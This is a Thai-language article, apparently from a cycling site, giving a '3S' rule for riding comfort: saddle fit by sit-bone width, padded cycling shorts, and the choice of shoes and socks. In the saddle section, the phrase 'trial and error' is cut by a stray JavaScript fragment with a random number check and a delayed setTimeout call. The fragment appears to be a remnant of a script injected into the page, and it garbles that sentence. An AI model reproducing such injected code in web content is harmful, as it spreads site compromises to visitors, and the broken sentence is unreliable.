เวลานั่งบนอ่านแล้วรู้สึกสบายตัว (Comfortable) การวางตำแหน่งของร่างกาย อย่างเช่น ตำแหน่งลำตัว แขนที่ยื่นไปจบแฮนด์ ขาเอวสำหรับตำแหน่งปั่นบันไดจักรยาน ไม่ยืดหรือหดจนเกิดความไม่สบายตัว เป็นสิ่งสำคัญที่สุดที่จะทำให้เราสามารถปั่นจักรยานได้คล่องตัว ปั่นได้นานและเลี่ยงอาการบาดเจ็บ สำหรับใครที่กำลังมาหาจักรยานสักคันเพื่อออกกำลังกายหรือใครที่มีอยู่แล้ว แต่รู้สึกว่ายังรู้สึกไม่สบายตัวเวลาปั่น เรามีกฎ 3S ที่จะช่วยปรับปรุงให้เราปั่นจักรยานได้สบายตัวมากขึ้น
กฏ 3S รู้ไว้เเล้วจะปั่นสบายขึ้น
กฎ 3S ที่จะช่วยให้เราปั่นจักรยานได้สบายตัวมากขึ้น ย่อมาจาก… Saddle, Shorts, Shoes, & Socks แปลเป็นไทยได้ว่า เบาะนั่งหรืออานจักรยาน กางเกงปั่นจักรยาน และ ถุงเท้ากับรองเท้า
1. Saddle (เบาะ/อานนั่งจักรยาน)
เพราะเป็นบริเวณที่ก้นเราต้องนั่งอยู่เป็นเวลาหลายชั่วโมง และมวลน้ำหนักของผู้ปั่นส่วนมากจะถูกถ่ายลงมาที่อาน ดังนั้นตัวอานก็ควรจะเป็นจุดแรกที่ต้องมีความฟิต (ระดับความนุ่ม องศา ลักษณะที่เข้ากับรูปก้น) เข้ากับจริตผู้ปั่น
เพราะบริเวณก้นนักปั่นมีส่วนที่ Sensitive อยู่มาก ดังนั้นการเลือกอานปั่นที่เหมาะสมกันจะช่วยให้ตัวผู้ปั่นสบายตัว มีความมั่นใจมากขึ้น ช่วยให้ปั่นได้นานขึ้น เร็วขึ้นและดึง Performance ออกมาได้ง่ายขึ้น
อานนั่งที่ดีต้องมีความนุ่มและกว้างหรือไม่….ตอบเลยว่าไม่เสมอไป ที่สำคัญเราต้องดูว่า อานนั่ง กว้างเหมาะกับส่วนที่เรียกว่า “sit bone width” เพราะเป็นส่วนที่นำหนักตัวถ่ายลงมามากที่สุด และพื้นที่ระหว่าง “sit bone width” ก็มีความไวต่อความรู้สึกและแรงกระแทกมาก

วิธีดูว่าขนาด “sit bone width” สามารถทำได้เองที่บ้าน โดยการตัดกระดาษลังมานั่งทับลงไปบนเก้าอี้แข็งๆ และรอยบุ๋มที่ลึกที่สุด ซึ่งจะมีสองจุด จะเป็นตัวกำหนดขนาด “sit bone width”ของเรา แนะนำว่าเวลาซื้ออานจักรยานให้บวกเข้าไปสัก 2 cm

ถามว่าถ้าซื้อขนาดกว้างมาเลยได้หรือไม่…ตอบเลยว่าไม่ควร เพราะขนาดอานที่ใหญ่ จะมีจมูก หรือส่วนที่เรียกว่า Nose ใหญ่ตามมาด้วย เวลานั่งปั่นส่วนจมูกจะไปดันพื้นที่ระหว่าง “sit bone width” เกิดการเสียดสีกับการรับแรงกระแทกได้ง่ายขึ้นและมากขึ้น
ตัวอย่างการเลือกซื้อเบาะ สามารถดูได้ตามตัวอย่าง ซึ่งกีฬาแต่ละประเภทก็มีแบบที่แนะนำต่างกันไป การเลือกซื้อส่วนมากจะเป็นประเภท Trial andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and error ลองสักครั้งสองครั้ง ผู้ปั่นก็น่าจะเจอแบบที่ชอบ
2. Short หรือกางเกงปั่นจักรยาน
เจ้าตัวกางเกงปั่นจักรยานจะมีความพิเศษอยู่ที่การมีเบาะฟองน้ำ โฟมหรือเจลรองรับบริเวณก้น ทำหน้าที่รองรับแรงกระแทกและการเสียดสี ยิ่งเวลาที่เราต้องนั่งปั่นจักรยานเป็นเวลานานแล้ว การมีโฟมหรือเจลรองรับแรงกระแทก จะช่วยลดอาการปวดเมื่อยลงได้

นอกจากการมีส่วนโฟมหรือเจลรับแรงกระแทกแล้ว กางเกงปั่นควรจะเข้ารูปเป็นเนื้อเดียวไปกับเอวและก้นของผู้ปั่น การผลิตด้วยเนื้อผ้ารัดรูป อย่างเนื้อผ้า Lycra จะช่วยเพิ่มความคล่องตัวและความสบายให้ผู้ปั่นมากขึ้น ด้วยเนื้อผ้ามีความยืดหยุ่นและระบายอากาศ ระบายเหงื่อได้ดีจะช่วยลดการเสียดสีและแรงต้านทานอากาศลง
3. Shore & Sock (รองเท้าและถุงเท้า)
รองเท้าเป็นส่วนที่ร่างกายเราถ่ายพลังงานลงสู่บันไดปั่น แน่นอนว่าการเลือกรองเท้าที่มีครีตล็อกเข้ากับบันไดปั่นจะเป็นตัวเลือกแรกๆ ในการส่งถ่ายและลดการสูญเสียพลังงานได้ดีที่สุด
การเลือกรองเท้าปั่นมี 3 จุดให้เลือกดู อย่างแรกคือ ลักษณะรูปทรงขนาดไซด์ของรองเท้า เหมาะกับลักษณะฝ่าเท้าเราหรือไม่ หลักการเลือกก็ไม่ต่างกันกับการเลือกรองเท้าวิ่ง การเลือกรองเท้าปั่นที่ใหญ่หลวมไปย่อมทำให้เกิดช่องว่าง เท้าเคลื่อนไปมาและการเสียดสี เกิดเป็นแผลผุผองได้ หรือหากเล็กไปก็จะกดบีบฝ่า มีอาการปวดเหน็บชา อาการเลือกรองเท้าไม่เหมาะสม นอกจากทำให้เกิดอาการบาดเจ็บแล้วยังทำให้พลังงานงานไม่สามารถถ่ายลงได้ 100% performance ของเราก็จะลดลง

จุดที่สองคือ ลักษณะวัสดุที่ใช้ผลิตทำรองเท้าและส่วนของ Upper body ลักษณะการล็อกห่อหุ้มรองฝ่าเท้ากับรองเท้า แบบผูกเชือก หรือคลิกล็อกและตีตะขาบที่นิยมในปัจจุบัน ผูกแล้วมีความฟิตเข้ากันดีหรือไม่ โดยรองเท้าปั่นก็จะแบ่งออกเป็น 2 กลุ่มหลักๆ คือ กลุ่มมือสมัครเล่น และกลุ่มรองเท้าสำหรับแข่งขัน
โดยกลุ่มมือสมัครเล่น รองเท้าจะมีลักษณะที่อ่อนนุ่มกว่า แต่ก็มีน้ำหนักมากกว่าเช่นกัน สามารถปรับแต่งความฟิตได้ระดับหนึ่ง แต่สำหรับรองเท้าแข่งขัน เราสามารถปรับแต่งรองเท้าให้เข้ากับฝ่ายเท้านักปั่นได้แทบร้อยเปอร์เซนต์ วัสดุที่ใช้ก็จะเป็นหนังแท้ หรือเนื้อผ้าเกรดสูงที่มีความเบาและระบายอากาศได้ดี ที่สำคัญรองเท้าแข่งขันมีฟีเจอร์พิเศษที่ทำให้ลู่ลมมากขึ้น
ส่วนที่สามคือ ความแข็งกระด้างหรือ stiffness ของรองเท้า ซึ่งรองเท้าสำหรับแข่งขัน พื้นนอกหรือส่วน outsole จะเป็นคาร์บอน ให้ความแข็งตัวสูง นั้นหมายความว่าแรงน้ำหนักที่ถ่ายลงไปจะส่งผ่านสู่บันไดปั่นได้เต็มที่ แต่ถ้าเป็นรองเท้าปั่นมือสมัครเล่นทั่วไปก็จะเป็นพื้นแบบ Nylon แข็งไม่มากนักแต่มีความยืดหยุ่นสูง มือใหม่ถ้าใส่รองเท้าแบบสำหรับแข็งขันจะมีอาการชาหรือเมื่อยฝ่าเท้าเกิดขึ้นได้เร็ว เพราะพื้นคาร์บอนมีการส่งคืนกลับแรงกระแทกได้ดี ด้วยเพราะมีความแข็งกระด่างสูง กล้ามเนื้อที่ยังไม่ได้รับการฝึกฝนจะเมื่อยล้าได้ง่ายและเร็ว ดังนั้นควรเริ่มจากรองเท้าธรรมดาที่มีความอ่อนโยน สามารถดูดซับแรงกระแทกได้ก็ เมื่อยฝึกได้ระดับหนึ่งก็ค่อยๆ พัฒนามาใส่รองเท้าสำหรับการแข่งขัน

ท้ายสุดคือเจ้าถุงเท้าที่จะช่วยเป็นตัวกลางช่วยรับแรงกระแทกบางส่วนและป้องกันการเสียดสีของเนื้อเท้ากับรองเท้า นักปั่นควรเลือกถุงเท้าปั่นจักรยาน ถุงเท้ากีฬาที่มีส่วนผสมของ nylon เป็นหลัก เพราะสามารถระบายอากาศได้ดี ยืดหยุ่นสูงกว่า Cotton ส่วนเจ้าถุงเท้าผ้า cotton เหมาะกับการใส่ทำงานหรือเดินไปมาในชีวิตประจำวันมากกว่า เพราะเวลาเปียกน้ำ จะอุ้มน้ำระบายอากาศไม่ดี กักความร้อนไว้สูงและเกิดการเสียดสีได้ง่าย ถุงเท้าก็ไม่ควรเลือกแบบ Ankle sock หรือถุงเท้าข้อสั้น เพราะจะทำให้เกิดการเสียดสีได้ง่าย หรือปั่นไปนานๆ ถุงเท้าจะลงไปกองที่ฝ่าเท้า เป็นต้น